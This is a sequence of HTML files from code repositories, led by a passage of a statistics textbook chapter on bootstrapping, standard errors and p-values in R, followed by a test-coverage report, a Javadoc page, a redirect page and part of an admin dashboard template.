class="ot">&lt;-</span> <span class="fu">replicate</span>(n_samp, {</span> <span id="cb22-2"><a href="statistical-significance-and-p-values.html#cb22-2" aria-hidden="true" tabindex="-1"></a> samp <span class="ot">&lt;-</span> <span class="fu">sample</span>(plant_morphs, <span class="at">replace =</span> <span class="cn">TRUE</span>)</span> <span id="cb22-3"><a href="statistical-significance-and-p-values.html#cb22-3" aria-hidden="true" tabindex="-1"></a> <span class="dv">100</span> <span class="sc">*</span> <span class="fu">sum</span>(samp <span class="sc">==</span> <span class="st">&quot;Purple&quot;</span>) <span class="sc">/</span> samp_size</span> <span id="cb22-4"><a href="statistical-significance-and-p-values.html#cb22-4" aria-hidden="true" tabindex="-1"></a>})</span></code></pre></div> <p>The <code>boot_out</code> vector now contains a bootstrapped sample of frequency estimates. Here are the first 30 values rounded to 1 decimal place:</p> <div class="sourceCode" id="cb23"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb23-1"><a href="statistical-significance-and-p-values.html#cb23-1" aria-hidden="true" tabindex="-1"></a><span class="fu">head</span>(boot_out, <span class="dv">30</span>) <span class="sc">%&gt;%</span> <span class="fu">round</span>(<span class="dv">1</span>)</span></code></pre></div> <pre><code>## [1] 31.6 24.0 26.8 29.2 32.8 26.4 34.4 27.6 33.2 32.8 33.6 26.0 34.0 29.6 29.6 ## [16] 31.2 29.6 30.4 29.6 27.2 30.8 28.8 29.6 30.4 32.8 30.0 31.6 35.6 34.4 32.0</code></pre> <p>(We used the pipe <code>%&gt;%</code> to make a code a bit more readable—remember, this won’t work unless the <strong>dplyr</strong> package is loaded.)</p> </div> <div id="making-sense-of-the-bootstrapped-sample" class="section level4 unnumbered"> <h4>Making sense of the bootstrapped sample</h4> <p>What has all this achieved? The numbers in <code>boot_out</code> represent the values of purple morph frequency we can expect to find if we repeated the data collection exercise many times, under the assumption that the purple morph frequency is equal to that of the actual sample. This is a bootstrapped sampling distribution!</p> <p>We can use this bootstrapped sampling distribution in a number of ways. Let’s plot it first get a sense of what it looks like. A histogram is OK here because we have a reasonably large number of possible cases:</p> <div class="figure" style="text-align: center"><span id="fig:boot-samp-dist"></span> <img src="stats-for-bio_files/figure-html/boot-samp-dist-1.png" alt="Bootstrapped sampling distribution of purple morph frequency" width="75%" /> <p class="caption"> Figure 8.1: Bootstrapped sampling distribution of purple morph frequency </p> </div> <p>What the most common values in our bootstrapped sample? The centre of the distribution looks to be round about 30%. We can be a bit more precise by calculating its mean:</p> <div class="sourceCode" id="cb25"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb25-1"><a href="statistical-significance-and-p-values.html#cb25-1" aria-hidden="true" tabindex="-1"></a><span class="fu">mean</span>(boot_out) <span class="sc">%&gt;%</span> <span class="fu">round</span>(<span class="dv">1</span>)</span></code></pre></div> <pre><code>## [1] 30.8</code></pre> <p>This is essentially the same as the point estimate of purple morph frequency from the true sample. In fact, it is guaranteed to be the same if we construct a large enough sample because we’re just resampling the data used to estimate that frequency.</p> <p>A more useful quantity is the standard error (SE) of our estimate. This is <em>defined</em> as being the standard deviation of the sampling distribution. We can calculate that by applying the <code>sd</code> function to the bootstrapped sample:</p> <div class="sourceCode" id="cb27"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb27-1"><a href="statistical-significance-and-p-values.html#cb27-1" aria-hidden="true" tabindex="-1"></a><span class="fu">sd</span>(boot_out) <span class="sc">%&gt;%</span> <span class="fu">round</span>(<span class="dv">1</span>)</span></code></pre></div> <pre><code>## [1] 2.9</code></pre> <p>The standard error is a very useful quantity. Remember, it is a measure of the precision of an estimate. For example, a large SE implies that our sample size was too small to reliably estimate the population mean; a small SE means we have a reliable estimate. Once we have the point estimate of a population parameter its standard error we’re able to start asking questions like, “is the true value likely to be different from 25%.”</p> <p>It is standard practice include the standard error when we report a point estimate of some quantity. Whenever we report a point estimate, we really should also report its standard error, like this:</p> <blockquote> <p>The frequency of purple morph plants (n = 250) was 30.8% (s.e. ± 2.9).</p> </blockquote> <p>Notice we also report the sample size. More on that later in the book.</p> </div> </div> </div> <div id="statistical-significance" class="section level2" number="8.2"> <h2><span class="header-section-number">8.2</span> Statistical significance</h2> <p>Now back to the question that motivated all the work in the last few chapters. Is the purple morph frequency greater than 25% in the new study population? The first thing to realise is that we can never answer a question like this definitively from a sample. We have to carry out some kind of probabilistic assessment instead. To make this assessment, we’re going to do something that looks odd at first glance.</p> <div class="do-something"> <p> <strong>Don’t panic! This stuff is hard.</strong> </p> <p> The ideas in this next section are very abstract and you may not understand them straight away. That’s fine. Don’t worry—these ideas take time to absorb and understand. </p> </div> <div id="carrying-out-the-assessment" class="section level3 unnumbered"> <h3>Carrying out the assessment</h3> <p>We need to make two assumptions to arrive at our probabilistic assessment of whether or not the purple morph frequency greater than 25%:</p> <ol style="list-style-type: decimal"> <li><p>Assume the true value of the purple morph frequency in our new study population is 25%, i.e. we’ll assume the population parameter of interest is the same as that of the original population that motivated this work. In effect, we’re pretending there is really no difference between the populations.</p></li> <li><p>Assume that the form of sampling distribution that we just generated would have been the same if the ‘equal population’ hypothesis were true. That is, the expected ‘shape’ of the sampling distribution would not change if the purple morph frequency really was 25%.</p></li> </ol> <p>That first assumption is an example of a <strong>null hypothesis</strong>. The null hypothesis is an hypothesis of ‘no effect’ or ‘no difference.’ We’re going to revisit this idea many times in future chapters.</p> <p>The second assumption is necessary for the reasoning below to work. In fact, this can be shown to be a pretty reasonable assumption in many situations. We don’t want to get lost in the details though so you will have to trust us on this one.</p> <p>Now we ask a question: if the purple morph frequency in the population really is 25%, what would its corresponding sampling distribution look like? This is called the <strong>null distribution</strong>—the distribution expected under the null hypothesis.</p> <p>If the second assumption is valid, we can actually construct the null distribution from our bootstrapped distribution as follows:</p> <div class="sourceCode" id="cb29"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb29-1"><a href="statistical-significance-and-p-values.html#cb29-1" aria-hidden="true" tabindex="-1"></a>null_dist <span class="ot">&lt;-</span> boot_out <span class="sc">-</span> <span class="fu">mean</span>(boot_out) <span class="sc">+</span> <span class="dv">25</span></span></code></pre></div> <p>All we did here was shift the bootstrapped sampling distribution along until the mean is at 25%. Here’s what that null distribution looks like, along with the original observed estimate of the purple morph frequency:</p> <div class="figure" style="text-align: center"><span id="fig:boot-samp-dist-25"></span> <img src="stats-for-bio_files/figure-html/boot-samp-dist-25-1.png" alt="Sampling distribution of purple morph frequency under the null hypothesis" width="75%" /> <p class="caption"> Figure 8.2: Sampling distribution of purple morph frequency under the null hypothesis </p> </div> <p>The red line shows where the point estimate from the true sample lies. What does this tells us? It looks like the observed purple morph frequency would be quite unlikely to have arisen through sampling variation if the population frequency really was 25%. We can say this because the observed frequency (red line) lies at the end of one ‘tail’ of the sampling distribution over on the right.</p> <p>We need to be able to make a more precise statement than this though. Instead of ‘eyeballing’ the distribution, we can quantify how often the values of the bootstrapped null distribution ended up greater than the observed estimate:</p> <div class="sourceCode" id="cb30"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb30-1"><a href="statistical-significance-and-p-values.html#cb30-1" aria-hidden="true" tabindex="-1"></a>p_value <span class="ot">&lt;-</span> <span class="fu">sum</span>(null_dist <span class="sc">&gt;</span> mean_point_est) <span class="sc">/</span> n_samp</span> <span id="cb30-2"><a href="statistical-significance-and-p-values.html#cb30-2" aria-hidden="true" tabindex="-1"></a>p_value</span></code></pre></div> <pre><code>## [1] 0.0246</code></pre> <p>This number (generally denoted ‘<em>p</em>’) is called a <strong><em>p</em>-value</strong>.</p> </div> <div id="interpreting-the-p-value" class="section level3 unnumbered"> <h3>Interpreting the p-value</h3> <p>What are we supposed to do with the finding <em>p</em> = 0.0246? This is the probability of obtaining a result equal to, or ‘more extreme,’ than that which was actually observed, <em>assuming that the hypothesis under consideration (the null hypothesis) is true</em>. The null hypothesis is one of no effect (or no difference), and so a low <em>p</em>-value can be interpreted as evidence for an effect being present. It’s worth reading that a few times…</p> <p>In our example, it appears that the purple morph frequency we observed is fairly unlikely to occur if its frequency in the new population really was 25%. In biological terms, we take the low <em>p</em>-value as evidence for a difference in purple morph frequency among the populations, i.e. the data supports the prediction that the purple morph is present at a frequency greater than 25% in the new study population.</p> <p>One important question remains: How small does a <em>p</em>-value have to be before we are happy to conclude that the effect we’re interested in is probably present? In practice, we do this by applying a threshold, called a <strong>significance level</strong>. If the <em>p</em>-value is less than the chosen significance level we say the result is said to be <strong>statistically significant</strong>. Most often (in biology at least), we use a significance level of <em>p</em> &lt; 0.05 (5%).</p> <p>Why do we use a significance level of <em>p</em> &lt; 0.05? The short answer is that this is just a convention. Nothing more. There is nothing special about the 5% threshold, other than the fact that it’s the one most often used. Statistical significance has nothing to do with biological significance. Unfortunately, many people are very uncritical about the use of this arbitrary threshold, to the extent that it can be very hard to publish a scientific study if it doesn’t contain ‘statistically significant’ results.</p> </div> </div> <div id="concluding-remarks" class="section level2" number="8.3"> <h2><span class="header-section-number">8.3</span> Concluding remarks</h2> <p>We just carried out a type of statistical test called a <strong>significance test</strong>. It was a bit convoluted reasoning, but the chain of reasoning we just employed underlies all the significance tests we use in this book. The precise details of how to construct such tests will vary from one problem to the next, but ultimately, when using frequentist ideas we always…</p> <ol style="list-style-type: decimal"> <li><p>assume that there is actually no ‘effect’ (the <strong>null hypothesis</strong>), where an effect is expressed in terms of one or more population parameters,</p></li> <li><p>construct the corresponding <strong>null distribution</strong> of the estimated parameter by working out what would happen if we were to take frequent samples in the ‘no effect’ situation,</p></li> </ol> <p>(This is why the word ‘frequentist’ is used to describe this flavour of statistics.)</p> <ol start="3" style="list-style-type: decimal"> <li>then compare the estimated population parameter to the null distribution to arrive at a <strong><em>p</em>-value</strong>, which evaluates how frequently the result, or a more extreme result, would be observed under the hypothesis of no effect.</li> </ol> <p>We used the bootstrap to operationalise that process for our example. Bootstrapping is certainly a useful tool but it is also quite an advanced technique that can be difficult to apply in many settings. We won’t use it any more—the bootstrap was introduced here to demonstrate how frequentist reasoning works.</p> <p>We will focus on simple, ‘off-the-shelf’ statistical tools in this book. The good news is we don’t need to understand the low-level details to use these tools effectively. As long as we’re able to identify the null hypothesis and understand how to interpret the associated <em>p</em>-values we should be in a good position to apply them. These two ideas—null hypotheses and <em>p</em>-values—are so important, we’re going consider them in much greater detail over the next two chapters.</p> </div> </div> </section> </div> </div> </div> <a href="sampling-error.html" class="navigation navigation-prev " aria-label="Previous page"><i class="fa fa-angle-left"></i></a> <a href="statistical-comparisons.html" class="navigation navigation-next " aria-label="Next page"><i class="fa fa-angle-right"></i></a> </div> </div> <script src="libs/gitbook-2.6.7/js/app.min.js"></script> <script src="libs/gitbook-2.6.7/js/lunr.js"></script> <script src="libs/gitbook-2.6.7/js/clipboard.min.js"></script> <script src="libs/gitbook-2.6.7/js/plugin-search.js"></script> <script src="libs/gitbook-2.6.7/js/plugin-sharing.js"></script> <script src="libs/gitbook-2.6.7/js/plugin-fontsettings.js"></script> <script src="libs/gitbook-2.6.7/js/plugin-bookdown.js"></script> <script src="libs/gitbook-2.6.7/js/jquery.highlight.js"></script> <script src="libs/gitbook-2.6.7/js/plugin-clipboard.js"></script> <script> gitbook.require(["gitbook"], function(gitbook) { gitbook.start({ "sharing": { "github": false, "facebook": true, "twitter": true, "linkedin": false, "weibo": false, "instapaper": false, "vk": false, "all": ["facebook", "twitter", "linkedin", "weibo", "instapaper"] }, "fontsettings": { "theme": "white", "family": "sans", "size": 2 }, "edit": { "link": "https://github.com/dzchilds/stats-for-bio/edit/master/2_02_significance_p-values.Rmd", "text": "Edit" }, "history": { "link": null, "text": null }, "view": { "link": null, "text": null }, "download": null, "toc": { "collapse": "section" }, "split_by": "section" }); }); </script> <!-- dynamically load mathjax for compatibility with self-contained --> <script> (function () { var script = document.createElement("script"); script.type = "text/javascript"; var src = "true"; if (src === "" || src === "true") src = "https://mathjax.rstudio.com/latest/MathJax.js?config=TeX-MML-AM_CHTML"; if (location.protocol !== "file:") if (/^https?:/.test(src)) src = src.replace(/^https?:/, ''); script.src = src; document.getElementsByTagName("head")[0].appendChild(script); })(); </script> </body> </html>
dzchilds/stats-for-bio
docs/statistical-significance-and-p-values.html
HTML
cc0-1.0
114,233
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <link rel="SHORTCUT ICON" href="../../../../../img/clover.ico" /> <link rel="stylesheet" href="../../../../../aui/css/aui.min.css" media="all"/> <link rel="stylesheet" href="../../../../../aui/css/aui-experimental.min.css" media="all"/> <!--[if IE 9]><link rel="stylesheet" href="../../../../../aui/css/aui-ie9.min.css" media="all"/><![endif]--> <style type="text/css" media="all"> @import url('../../../../../style.css'); @import url('../../../../../tree.css'); </style> <script src="../../../../../jquery-1.8.3.min.js" type="text/javascript"></script> <script src="../../../../../aui/js/aui.min.js" type="text/javascript"></script> <script src="../../../../../aui/js/aui-experimental.min.js" type="text/javascript"></script> <script src="../../../../../aui/js/aui-soy.min.js" type="text/javascript"></script> <script src="../../../../../package-nodes-tree.js" type="text/javascript"></script> <script src="../../../../../clover-tree.js" type="text/javascript"></script> <script src="../../../../../clover.js" type="text/javascript"></script> <script src="../../../../../clover-descriptions.js" type="text/javascript"></script> <script src="../../../../../cloud.js" type="text/javascript"></script> <title>ABA Route Transit Number Validator 1.0.1-SNAPSHOT</title> </head> <body> <div id="page"> <header id="header" role="banner"> <nav class="aui-header aui-dropdown2-trigger-group" role="navigation"> <div class="aui-header-inner"> <div class="aui-header-primary"> <h1 id="logo" class="aui-header-logo aui-header-logo-clover"> <a href="http://openclover.org" title="Visit OpenClover home page"><span class="aui-header-logo-device">OpenClover</span></a> </h1> </div> <div class="aui-header-secondary"> <ul class="aui-nav"> <li id="system-help-menu"> <a class="aui-nav-link" title="Open online documentation" target="_blank" href="http://openclover.org/documentation"> <span class="aui-icon aui-icon-small aui-iconfont-help">&#160;Help</span> </a> </li> </ul> </div> </div> </nav> </header> <div class="aui-page-panel"> <div class="aui-page-panel-inner"> <div class="aui-page-panel-nav aui-page-panel-nav-clover"> <div class="aui-page-header-inner" style="margin-bottom: 20px;"> <div class="aui-page-header-image"> <a href="http://cardatechnologies.com" target="_top"> <div class="aui-avatar aui-avatar-large aui-avatar-project"> <div class="aui-avatar-inner"> <img src="../../../../../img/clover_logo_large.png" alt="Clover icon"/> </div> </div> </a> </div> <div class="aui-page-header-main" > <h1> <a href="http://cardatechnologies.com" target="_top"> ABA Route Transit Number Validator 1.0.1-SNAPSHOT </a> </h1> </div> </div> <nav class="aui-navgroup aui-navgroup-vertical"> <div class="aui-navgroup-inner"> <ul class="aui-nav"> <li class=""> <a href="../../../../../dashboard.html">Project overview</a> </li> </ul> <div class="aui-nav-heading packages-nav-heading"> <strong>Packages</strong> </div> <div class="aui-nav project-packages"> <form method="get" action="#" class="aui package-filter-container"> <input type="text" autocomplete="off" class="package-filter text" placeholder="Type to filter packages..." name="package-filter" id="package-filter" title="Start typing package name (or part of the name) to search through the tree. Use arrow keys and the Enter key to navigate."/> </form> <p class="package-filter-no-results-message hidden"> <small>No results found.</small> </p> <div class="packages-tree-wrapper" data-root-relative="../../../../../" data-package-name="com.cardatechnologies.utils.validators.abaroutevalidator"> <div class="packages-tree-container"></div> <div class="clover-packages-lozenges"></div> </div> </div> </div> </nav> </div> <section class="aui-page-panel-content"> <div class="aui-page-panel-content-clover"> <div class="aui-page-header-main"><ol class="aui-nav aui-nav-breadcrumbs"> <li><a href="../../../../../dashboard.html"> Project Clover database Sat Aug 7 2021 12:29:33 MDT</a></li> <li><a href="test-pkg-summary.html">Package com.cardatechnologies.utils.validators.abaroutevalidator</a></li> <li><a href="test-Test_AbaRouteValidator_03.html">Class Test_AbaRouteValidator_03</a></li> </ol></div> <h1 class="aui-h2-clover"> Test testAbaNumberCheck_4953_good </h1> <table class="aui"> <thead> <tr> <th>Test</th> <th><label title="The test result. Either a Pass, Fail or Error.">Status</label></th> <th><label title="When the test execution was started">Start time</label></th> <th><label title="The total time in seconds taken to run this test.">Time (seconds)</label></th> <th><label title="A failure or error message if the test is not successful.">Message</label></th> </tr> </thead> <tbody> <tr> <td> <a href="../../../../../com/cardatechnologies/utils/validators/abaroutevalidator/Test_AbaRouteValidator_03.html?line=58937#src-58937" >testAbaNumberCheck_4953_good</a> </td> <td> <span class="sortValue">1</span><span class="aui-lozenge aui-lozenge-success">PASS</span> </td> <td> 7 Aug 12:33:30 </td> <td> 0.0 </td> <td> <div></div> <div class="errorMessage"></div> </td> </tr> </tbody> </table> <div>&#160;</div> <table class="aui aui-table-sortable"> <thead> <tr> <th style="white-space:nowrap;"><label title="A class that was directly hit by this test.">Target Class</label></th> <th colspan="4"><label title="The percentage of coverage contributed by each single test.">Coverage contributed by</label> testAbaNumberCheck_4953_good</th> </tr> </thead> <tbody> <tr> <td> <span class="sortValue">com.cardatechnologies.utils.validators.abaroutevalidator.AbaRouteValidator</span> &#160;&#160;<a href="../../../../../com/cardatechnologies/utils/validators/abaroutevalidator/AbaRouteValidator.html?id=14548#AbaRouteValidator" title="AbaRouteValidator" name="sl-47">com.cardatechnologies.utils.validators.abaroutevalidator.AbaRouteValidator</a> </td> <td> <span class="sortValue">0.7352941</span>73.5% </td> <td class="align-middle" style="width: 100%" colspan="3"> <div> <div title="73.5% Covered" style="min-width:40px;" class="barNegative contribBarNegative contribBarNegative"><div class="barPositive contribBarPositive contribBarPositive" style="width:73.5%"></div></div></div> </td> </tr> </tbody> </table> </div> <!-- class="aui-page-panel-content-clover" --> <footer id="footer" role="contentinfo"> <section class="footer-body"> <ul> <li> Report generated by <a target="_new" href="http://openclover.org">OpenClover</a> v 4.4.1 on Sat Aug 7 2021 12:49:26 MDT using coverage data from Sat Aug 7 2021 12:47:23 MDT. </li> </ul> <ul> <li>OpenClover is free and open-source software. </li> </ul> </section> </footer> </section> <!-- class="aui-page-panel-content" --> </div> <!-- class="aui-page-panel-inner" --> </div> <!-- class="aui-page-panel" --> </div> <!-- id="page" --> </body> </html>
dcarda/aba.route.validator
target13/site/clover/com/cardatechnologies/utils/validators/abaroutevalidator/Test_AbaRouteValidator_03_testAbaNumberCheck_4953_good_b84.html
HTML
apache-2.0
9,178
<p> This example shows how Telerik DatePicker for ASP.NET MVC is being validated through the built-in server-side validation capabilities of ASP.NET MVC. </p> <pre class="prettyprint"> &lt%= Html.ValidationSummary() %&gt; &lt% using (Html.BeginForm("Action", "Controller")) { %&gt &lt%= Html.Telerik().DatePicker() .Name("deliveryDate") %> &lt%= Html.ValidationMessage("deliveryDate", "*") %&gt &lt;input type="submit" value="Post" /&gt <% } %> </pre> <p> Additionally you can use <em>DatePickerFor</em> extension in order to create DatePicker for a concrete <em>Model property</em>. If it has <strong>Range</strong> attribute, DatePicker component will use it to define min and max date contraints. </p>
wenbinke/susucms
SusuCMS.Web/Content/DatePicker/Descriptions/ServerValidation.html
HTML
apache-2.0
752
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_45) on Tue Jul 28 00:20:21 PDT 2015 --> <title>Uses of Package org.apache.zookeeper.client (ZooKeeper 3.5.1-alpha API)</title> <meta name="date" content="2015-07-28"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Package org.apache.zookeeper.client (ZooKeeper 3.5.1-alpha API)"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/apache/zookeeper/client/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Uses of Package org.apache.zookeeper.client" class="title">Uses of Package<br>org.apache.zookeeper.client</h1> </div> <div class="contentContainer">No usage of org.apache.zookeeper.client</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/apache/zookeeper/client/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &copy; 2015 The Apache Software Foundation</small></p> </body> </html>
BZCareer/zookeeper-quickstart
docs/api/org/apache/zookeeper/client/package-use.html
HTML
apache-2.0
4,173
<!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="refresh" content="0;URL=type.U27.html"> </head> <body> <p>Redirecting to <a href="type.U27.html">type.U27.html</a>...</p> <script>location.replace("type.U27.html" + location.search + location.hash);</script> </body> </html>
nitro-devs/nitro-game-engine
docs/typenum/consts/U27.t.html
HTML
apache-2.0
293
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <title>Bootstrap3响应式后台管理系统模版MeAdmin 表单布局</title> <link href="bootstrap/css/bootstrap.min.css" rel="stylesheet" type="text/css" /> <!--[if lt IE 9]> <link rel="stylesheet" type="text/css" href="plugins/jquery-ui/jquery.ui.1.10.2.ie.css" /> <![endif]--> <link href="assets/css/main.css" rel="stylesheet" type="text/css" /> <link href="assets/css/plugins.css" rel="stylesheet" type="text/css" /> <link href="assets/css/responsive.css" rel="stylesheet" type="text/css" /> <link href="assets/css/icons.css" rel="stylesheet" type="text/css" /> <link rel="stylesheet" href="assets/css/fontawesome/font-awesome.min.css"> <!--[if IE 7]> <link rel="stylesheet" href="assets/css/fontawesome/font-awesome-ie7.min.css"> <![endif]--> <!--[if IE 8]> <link href="assets/css/ie8.css" rel="stylesheet" type="text/css" /> <![endif]--> <link href='http://fonts.useso.com/css?family=Open+Sans:400,600,700' rel='stylesheet' type='text/css'> <script type="text/javascript" src="assets/js/libs/jquery-1.10.2.min.js"> </script> <script type="text/javascript" src="plugins/jquery-ui/jquery-ui-1.10.2.custom.min.js"> </script> <script type="text/javascript" src="bootstrap/js/bootstrap.min.js"> </script> <script type="text/javascript" src="assets/js/libs/lodash.compat.min.js"> </script> <!--[if lt IE 9]> <script src="assets/js/libs/html5shiv.js"> </script> <![endif]--> <script type="text/javascript" src="plugins/touchpunch/jquery.ui.touch-punch.min.js"> </script> <script type="text/javascript" src="plugins/event.swipe/jquery.event.move.js"> </script> <script type="text/javascript" src="plugins/event.swipe/jquery.event.swipe.js"> </script> <script type="text/javascript" src="assets/js/libs/breakpoints.js"> </script> <script type="text/javascript" src="plugins/respond/respond.min.js"> </script> <script type="text/javascript" src="plugins/cookie/jquery.cookie.min.js"> </script> <script type="text/javascript" src="plugins/slimscroll/jquery.slimscroll.min.js"> </script> <script type="text/javascript" src="plugins/slimscroll/jquery.slimscroll.horizontal.min.js"> </script> <script type="text/javascript" src="plugins/sparkline/jquery.sparkline.min.js"> </script> <script type="text/javascript" src="plugins/daterangepicker/moment.min.js"> </script> <script type="text/javascript" src="plugins/daterangepicker/daterangepicker.js"> </script> <script type="text/javascript" src="plugins/blockui/jquery.blockUI.min.js"> </script> <script type="text/javascript" src="assets/js/app.js"> </script> <script type="text/javascript" src="assets/js/plugins.js"> </script> <script type="text/javascript" src="assets/js/plugins.form-components.js"> </script> <script> $(document).ready(function() { App.init(); Plugins.init(); FormComponents.init() }); </script> <script type="text/javascript" src="assets/js/custom.js"> </script> </head> <body> <header class="header navbar navbar-fixed-top" role="banner"> <div class="container"> <ul class="nav navbar-nav"> <li class="nav-toggle"> <a href="javascript:void(0);" title=""> <i class="icon-reorder"> </i> </a> </li> </ul> <a class="navbar-brand" href="index.html"> <img src="assets/img/logo.png" alt="logo" /> <strong> Me </strong> Admin </a> <a href="#" class="toggle-sidebar bs-tooltip" data-placement="bottom" data-original-title="Toggle navigation"> <i class="icon-reorder"> </i> </a> <ul class="nav navbar-nav navbar-left hidden-xs hidden-sm"> <li> <a href="#"> Dashboard </a> </li> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"> Dropdown <i class="icon-caret-down small"> </i> </a> <ul class="dropdown-menu"> <li> <a href="#"> <i class="icon-user"> </i> Example #1 </a> </li> <li> <a href="#"> <i class="icon-calendar"> </i> Example #2 </a> </li> <li class="divider"> </li> <li> <a href="#"> <i class="icon-tasks"> </i> Example #3 </a> </li> </ul> </li> </ul> <ul class="nav navbar-nav navbar-right"> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"> <i class="icon-warning-sign"> </i> <span class="badge"> 5 </span> </a> <ul class="dropdown-menu extended notification"> <li class="title"> <p> You have 5 new notifications </p> </li> <li> <a href="javascript:void(0);"> <span class="label label-success"> <i class="icon-plus"> </i> </span> <span class="message"> New user registration. </span> <span class="time"> 1 mins </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="label label-danger"> <i class="icon-warning-sign"> </i> </span> <span class="message"> High CPU load on cluster #2. </span> <span class="time"> 5 mins </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="label label-success"> <i class="icon-plus"> </i> </span> <span class="message"> New user registration. </span> <span class="time"> 10 mins </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="label label-info"> <i class="icon-bullhorn"> </i> </span> <span class="message"> New items are in queue. </span> <span class="time"> 25 mins </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="label label-warning"> <i class="icon-bolt"> </i> </span> <span class="message"> Disk space to 85% full. </span> <span class="time"> 55 mins </span> </a> </li> <li class="footer"> <a href="javascript:void(0);"> View all notifications </a> </li> </ul> </li> <li class="dropdown hidden-xs hidden-sm"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"> <i class="icon-tasks"> </i> <span class="badge"> 7 </span> </a> <ul class="dropdown-menu extended notification"> <li class="title"> <p> You have 7 pending tasks </p> </li> <li> <a href="javascript:void(0);"> <span class="task"> <span class="desc"> Preparing new release </span> <span class="percent"> 30% </span> </span> <div class="progress progress-small"> <div style="width: 30%;" class="progress-bar progress-bar-info"> </div> </div> </a> </li> <li> <a href="javascript:void(0);"> <span class="task"> <span class="desc"> Change management </span> <span class="percent"> 80% </span> </span> <div class="progress progress-small progress-striped active"> <div style="width: 80%;" class="progress-bar progress-bar-danger"> </div> </div> </a> </li> <li> <a href="javascript:void(0);"> <span class="task"> <span class="desc"> Mobile development </span> <span class="percent"> 60% </span> </span> <div class="progress progress-small"> <div style="width: 60%;" class="progress-bar progress-bar-success"> </div> </div> </a> </li> <li> <a href="javascript:void(0);"> <span class="task"> <span class="desc"> Database migration </span> <span class="percent"> 20% </span> </span> <div class="progress progress-small"> <div style="width: 20%;" class="progress-bar progress-bar-warning"> </div> </div> </a> </li> <li class="footer"> <a href="javascript:void(0);"> View all tasks </a> </li> </ul> </li> <li class="dropdown hidden-xs hidden-sm"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"> <i class="icon-envelope"> </i> <span class="badge"> 1 </span> </a> <ul class="dropdown-menu extended notification"> <li class="title"> <p> You have 3 new messages </p> </li> <li> <a href="javascript:void(0);"> <span class="photo"> <img src="assets/img/demo/avatar-1.jpg" alt="" /> </span> <span class="subject"> <span class="from"> Bob Carter </span> <span class="time"> Just Now </span> </span> <span class="text"> Consetetur sadipscing elitr... </span> </a> </li> <li> <a href="javascript:void(0);"> <span class="photo"> <img src="assets/img/demo/avatar-2.jpg" alt="" /> </span> <span class="subject"> <span class="from"> Jane Doe </span> <span class="time"> 45 mins </span> </span> 